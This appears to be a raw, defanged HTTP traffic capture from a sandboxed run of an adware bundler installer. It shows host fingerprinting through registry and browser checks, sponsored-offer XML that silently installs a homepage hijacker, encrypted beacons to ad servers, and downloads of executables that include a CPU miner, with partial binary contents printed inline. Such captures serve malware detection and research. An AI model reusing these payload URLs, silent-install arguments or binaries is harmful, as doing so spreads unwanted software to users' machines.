{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:21 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /binsis/get_pre_offering_checks?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Fri, 25 Sep 2015 20:59:13 GMT
Expires: Fri, 25 Sep 2015 18:12:33 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 f989b812753677758cd8909391e239ac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bJ7qZdd1PaK6k-GVDpBvzjf4lLWfXOeySZS98b5UrmbKqjb17Dr_aA==
37a0..<?xml version="1.0"?>.<pre_offering_checks><check type="registry" return_name="check_4" return_value_type="boolean"><value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check></check><check type="registry" return_name="check_586" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer</key><name>AppsHat</name></value_to_check></check><check type="registry" return_name="check_1842" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer\AppsHat</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2182" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2246" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2450" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check></check><check type="registry" return_name="check_3850" return_value_type="boolean"><val
<<< skipped >>>
POST /binsis/xml?uid=8A52D41A77F94021AA693531F4B425AD&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgOTEgYTcgMjYgNjcgYjIgYWQtNWMgMDIgMzcgNDIgZmEgOGEgOGIgMzcgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: nsb32.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 8804
Connection: Keep-Alive
Cache-Control: no-cache
installer_data={"uid":"8A52D41A77F94021AA693531F4B425AD","muid":"bb240ea4d92fcc6bc5ca46520f398adc","affid":"vuupcntmb","sid":"vuupculwo","installerVersion":"2.2.2","osVersion":"5.1.2600 32bit","ieVersion":"6.0.2900.5512","ff_installed":"0","ff_version":"","ff_default_homepage":"not_found","ff_is_default":"0","ie_installed":"1","ie_version":"6.0.2900.5512","ie_default_homepage":"about:blank","ie_is_default":"0","chrome_installed":"0","chrome_version":"","chrome_default_homepage":"not_found","chrome_is_default":"0","opera_installed":"0","opera_version":"","opera_default_homepage":"not_found","opera_is_default":"0","safari_installed":"0","safari_version":"","safari_default_homepage":"not_found","safari_is_default":"0","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Fri, 25 Sep 2015 20:59:20 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Sep 2015 18:12:40 GMT
Cache-Control: no-cache
X-Cache: Miss from cloudfront
Via: 1.1 f989b812753677758cd8909391e239ac.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0v6xaVGqLR8dot9XMb3ee755wfxnNCNeuS03cJYIdr7hzVYBA2IERw==
4c0..<?xml version="1.0" encoding="windows-1252"?>.<sponsored_data><downloader><url>hXXp://sub.spirlymo.com/installers/bi_downloader/1443211351854/setup.exe</url><downloadOnInit>1</downloadOnInit><args>/silent /initurl hXXp://sub.yorkshatb.com/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%SoftwareID%" -affid="¯filiateID%" -muid="%MUID%"</args></downloader><offers><offer id="istartsurf"><remote_resources/><downloader><args>_!delimiter!_ -offerId="%OfferID%" -softwareName="Istartsurf"</args></downloader><title>Special Offer</title><sub_title>To go along with your Vuupc</sub_title><download_url>hXXp://d2drfrdurj6mvo.cloudfront.net/liyan/smt_istartsurf.exe</download_url><execution_arguments>-silence -ptid=smt</execution_arguments><options><option type="v_space" height="5"/><option type="text" width="100"><id>descriptionElement</id><text><decor type="text">Make Istartsurf my browser homepage, default search and new tab</decor></text></option><option type="v_space" height="5"/><option type="text" width="100"><id>footerElement</id><text><decor type="text">By clicking Next you are agreeing to Istartsurf</decor><decor type="link" href="hXXp://VVV.istartsurf.com/license_agreement.html">Terms of Use</deco..12b8..r><decor type="text">and</decor>
<<< skipped >>>
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:12 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Fri, 25 Sep 2015 20:58:12 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=8FB148141BB94CB98BCB1B481D21EC8E; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=8FB148141BB94CB98BCB1B481D21EC8E,1443214749.35392; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
GET /installers/bi_downloader/1443211351854/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sub.spirlymo.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 430280
Connection: keep-alive
Server: nginx
Date: Fri, 25 Sep 2015 20:02:52 GMT
Last-Modified: Fri, 25 Sep 2015 20:02:33 GMT
ETag: "5605a859-690c8"
Expires: Fri, 25 Sep 2015 20:12:52 GMT
Cache-Control: max-age=600
Accept-Ranges: bytes
Age: 238
X-Cache: Hit from cloudfront
Via: 1.1 a034346227db119f7e0813186ca2d2c2.cloudfront.net (CloudFront)
X-Amz-Cf-Id: _sCOF5yhy6C0IThTVV2ujHmEAbjFR4hwCmxutSK5EdOHKbinHOz0ZA==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................0...............................................s..........pD..........H................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc...pD.......F...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /crossbrowse/ie/107/ie.zip.003 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:13 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441008913"
Last-Modified: Mon, 31 Aug 2015 08:15:13 GMT
Cache-Control: max-age=47138
Content-Length: 8244985
Content-Type: text/plain; charset=UTF-8
X-HW: 1443214693.dop001.fr7.t,1443214693.cds002.fr7.c
l...%...J.....=.6...<.,........#....U.s.I.* m..e_O.'.x..4.SV..x...q...d.[.R...A_.....&........."b.....g.........^...N}...$............^..O.&.S....y.Q..vm.!.W........j.kt.......D....%G......*..$.k...@c".e...wu..b.3..oV.....G..ER...o.V..co....v.P..[}.....m.......3.;.E..r.O...{."..'V.-....V.L.4....RF. .:`....M.8..z....z.m....7>...<t?.)$g.'.....~..i.i..W..gV...vZV......dy.cec<F2.8..ZT.W...}d.m..m5..h^...../.@.c.F.....vW......<.PQ....I.8...L-...C...........<%....n..b.4.3gJ.h.D.U...8....PV80..R.so~..k..S QGp4.%.i..I..?...Z@%.B..U!1..m.3.........|7h..s.;V,WBbPQ}=.......%..o......hc........5.9...v|.t...<"....t.Z6.........f.4.3.H..Y ...d...C-.u...B.....RIK:.*$$JP.........q..v.-........$....q..@.../-.. 6Ie.....7....0b...NR.Ti.<U.@a.$.8.m`.i... ~.Y.)j0....%....M.... .CF?0......pd.........M......~m.8.#3b .>...3|`./|W.=../#7j\U..k..@7..G.1.K..?=J../ ?....M...U.`...P.2....A&'?.:oI...\.}6...=k..D..Jv..<HfG..).>p..?.R1....GUo._.mb.M" X...6........#...V$...........GX[R...=.xX.C ~N.2..!gs.(.o...qa.......y0..G......p$0. ^.`.@.*..)?....u.&...L......6....................Q$....4AJFn....kj...................q...Q.K;.E.}..\9eL..jO4.....N..Y.........}GD{.j.....d.c.(...uMK$.h.T........~0..T.<a......PPC..x..&.%`}."5...Q%.4RS..F>@T.}...;..w...zOoL....^DX.<..'.M.Nl\..E{(.}....5.s.(....a.[...,....@.xD.:$.D?.h...:T.=r./.VD.V......k.J..9.dC..g.>_.9.........(RiV......]...}....u7.J..:c.,...D....O..-..A.x.... PP..j;...b...TA..(.,]... r..........t.....5.7`H.)<6A...9.....tD...bl.]e....F....{ .....5..
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 469
Connection: Keep-Alive
Cache-Control: no-cache
cnt=b16588e178af30fb408c77953db6f401&_srvlog=NSI &browser=ie&capp=nsdummy&cid=11612¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&te=1443214717&ts=1443214716&ver=1.1.2.41&c[OperaRUnew][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[OperaRUnew][pi]=0&c[OperaRUnew][e]=0&c[OperaRUnew][ts]=0&c[OperaRUnew][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsr18.tmp /ci 11612&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 20:58:37 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Fri, 25 Sep 2015 20:58:37 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....
POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 3412015665
x-spidermessenger-length: 275
Content-Type: text/*
User-Agent: gmsd_re_005010096-gmsd_re_005010096
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 406
Cache-Control: no-cache
ujXl2iaEv38K+/yRWyXC+m7rYR+qMqcsAaJIoxT54jOVrSF2+RX+r1ugkxX7buaKejfG1TigRcOM3yZsClNi6+RKQstPciC/856Qj+eW+2Ds/sNwgcHbBD7Jseu82BMjcZoqd9m22IdjGh25xHdq7YLxw2vNXIwoP8ZbkXd9QaHFABou/P9RHNZRYT0z+v2DbKvEF6irE1i5wAqDxg41wbQqiXx3dDtQ9Nj0kd6iEQ+8xgoJnJa1RwardrhSV9zTpLGFIeaIiTokC/EfCJRVGVu8VLEGU9sG9gUZsbBf19GgqWq+j5DDk8EA/rPxA7aS+lY3ONadlXpVpiTFc4lqWGWIlIU+EwXL/Vy03LgZKMI=
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:07 GMT
Server: Apache/2.2.22
x-SPIDERMESSENGER-crypted: 2
x-SPIDERMESSENGER-length: 26779
x-SPIDERMESSENGER-crc32: -1
Set-Cookie: conftime=1443214747; expires=Wed, 19 Jan 16 14:45:00 GMT; domain=youandmeandmeandyouhihi.com; path=/;
Set-Cookie: EoRezo=194.242.96.218.1443214747022937; path=/; expires=Sun, 25-Oct-15 20:59:07 GMT
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/plain
8b8c..0NogVEVNeZU/g6fcxXpPm8L/TbLACp6qNZeGXV8m6ec/K8dk0/yY5pEI4yS2Vf5K1CwWkZ8xeq2FoHZiTq7fWERGyCAg88jpdmzVknJJbtdhSvgVLNEQZKmNKxPN3kfiojYYz2J4lcZpqMJFnuekB68OnLZXcL3ov7CupVcdabeJuH1jlD4y/K3QDG2chz707pf3 AMEnTYm5UctPKyamFfHt8RRlaWa7rxj/wyfyN71kSi8U7AumPkLogJnxGSIConRU9DkS3LW UZKg0Bs9CDwlUQew7NyZ3z/JVCjV2ObeVgi9jUBULCRlz9Y1GH83qN hM2Gx4LBEDGACKRUE0tpNZECA3HaSoebnGFCprL3 NKFrrOmcaIKTpolHxvt7iWT5P3OcdduGsQ7PK2F/1/ImMSkwRLJKv2wjvk H2aMoECBsUjP lXf1v/bdhQz1gcrIjliSL5D6Y1zEnTfDFER/ H1/waN2NxexqwzNAGQhxkEuW2YXEyZfP9ScMREJHieN/jkhPvM0pCRZWHVmwwDz0cDbEaFeIcjL3iiVDyOo4lMGYSJRvYnzMm2Jg82YT/5jAbi4dqydpEqqE ON39OZuQ2BCtPof46kKnFTTeUxnt/Q1w95TqebKSUFbUUHYAd1E30FFsYXmRRhdYNzTbQtUMqVCS xppXLwNI5qh2qG9kfuM5 1LGoHxI2p1nRfxCZURmarLRHGAnhsa7toV7UeC5sjq2Ns8CFHrql5B 8WlEdgy01fnRdOm8bjre7KzMMuCSOYBfBKVDhcDdvtq3uXsQcqtZuD/Gh7s7khiEwyjILzMwmL4 RCBjK CIhSRu 8CrqrZPYSQPEMx5YNtUtPu/kKVvTaAI1DsstgJQETBh0l27OrCckPydlv6Dk0vwBz/m8vjAcS wY6KG2XOayizDu8jJvL781dkaRevCStVtdZWLM yCqSKdqI7u2N/6sla1laRA9mzEk16JdzTqpqdqnV6haAN6LsGxjw8yU0Bg/xayUYK8V4GAg2BgMvSnphDcXSU8LI8yeHJ6evOse4ZWotYdSDoPrh/PXgtgkz9SgRmz3oHxXhNrHFFXnHCiVSIjp4aLJpsZGO22jBpMaSuogal5or3BB9rZF GKCQCMpPCapG2J04hDZhSUt4JsT hWVU XpNsGk61PcTxG82C4h7epEM3Cy2gnokdDsAH51 afaI5MPF mgeat6FnB kLdk93oGywxSV8z8D6ZaRwSXLYzREE8Nqs31ULnCsEhbruL2RVKg0QF9aG0/xuxVk cYhGoWzE9ZNghRlbZMNsUIEnTx1KMwpLzRr2yUDXdWBeIV2UF CV7IQ3MSNqPeUoGELftHUHejIiU/D 52t3dtPqrCHerFRSTWFH5lb9YFPK5YUoPbI6j51Hrsa0uTel4/IkO9oO8oVtxDIq3okQqOHtQYVE2z5poWmiHI6YM6r5eGzfH/Phblc3As7ZAysFqQU0o2pTLYY060ygLAQowhEa 1oihMtOLFHd4OteAec/KVvogYh
<<< skipped >>>
GET /CPUminer/v6/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:43 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441897175"
Last-Modified: Thu, 10 Sep 2015 14:59:35 GMT
Cache-Control: max-age=34467
Content-Length: 104395
Content-Type: application/octet-stream
X-HW: 1443214724.dop012.fr7.t,1443214723.cds004.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..iu..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L...^..K.................b...........6............@.....................................................................................8............................................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data................x..............@....ndata... ...p...........................rsrc...8...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....cB..H.P.u..u..u...T.@..B...SV.5.cB..E.WP.u...X.@..e...E..E.P.u...\.@..}..e....D.@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...H.@..E...E.P.E.P.u...`.@..u....E..9}...w....~X.te.v4..L.@....E.tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W...E..E.h ...Pj.h.[B.W..d.@..u.W...u....E.P.u...h.@._^3.[.....L$..(cB...Si.....VW.T.....tO.q.3.;5,cB.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5,cB.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010096-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:07 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1443214747.35666; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"}]}},"freeze":3600,"refresh":3600,"version":116555}..0..
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:58:08 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441951687"
Last-Modified: Fri, 11 Sep 2015 06:08:07 GMT
Cache-Control: max-age=2615
Content-Length: 1998408
Content-Type: application/x-msdownload
X-HW: 1443214689.dop006.fr7.t,1443214688.cds030.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..S............F.>.%...F.......F...Z.....e...............b.C...o.K.......r.......................:.......v.......?.....Rich............PE..L...&L.U............................./.......0....@..................................x....@................................. I...........A...........v..H............3..8...............................@............0...............................text...T........................... ..`.rdata..j*...0...,..................@..@.data....0...`.......F..............@....rsrc....A.......B...0..............@..@.reloc...............r..............@..B........................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_COUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 25 Sep 2015 20:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Fri, 25 Sep 15 20:59:00 GMT
Set-Cookie: _c4aid=9A6B9A8C52E147EA857C4E446034B0B1; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=9A6B9A8C52E147EA857C4E446034B0B1,1443214749.68757; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 460
Connection: Keep-Alive
Cache-Control: no-cache
cnt=5abcf66d3f0dc523a5803c4e5557f120&_srvlog=NSI &browser=un&capp=nsdummy&cid=12216¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&te=1443214726&ts=1443214726&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsr21.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Fri, 25 Sep 2015 20:58:46 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ....
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 46305
Connection: keep-alive
Date: Fri, 25 Sep 2015 20:05:40 GMT
Last-Modified: Fri, 25 Sep 2015 20:00:37 GMT
ETag: "d4937ebdbcea35fc0f12233e57c30ca4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 3129
X-Cache: Hit from cloudfront
Via: 1.1 e13dc20cb35881b25fb296fb0383f55c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: y9BfFCZYn6rBqOYbS3Kp0ogsFzshOdWQ08vtiTBdcapaDD_Rzvsjlw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......................................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata.......@...........................rsrc................t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 124
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4605\",\"channel_id\": \"\", \"utm_addition\":\"vpol=som&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Fri, 25 Sep 2015 20:59:24 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:24 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /7121923af824073a25b2b7e6ba0a6e0e.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d1mdi78qyff344.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 91074
Connection: keep-alive
Date: Thu, 24 Sep 2015 23:30:47 GMT
Last-Modified: Thu, 24 Sep 2015 22:26:40 GMT
ETag: "029aa26a0dd5ef7bd1ba1639703f8fae"
Accept-Ranges: bytes
Server: AmazonS3
Age: 77267
X-Cache: Hit from cloudfront
Via: 1.1 bd5652a800046ffa43683320c0e731b4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0--xCiVe4KF4xhuzhsyv4CdyEdfpC8lEZXuiObvfot_2jeG3U8Xq7A==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@...........................)..............................................t........)..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata....&..............................rsrc.........)......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... 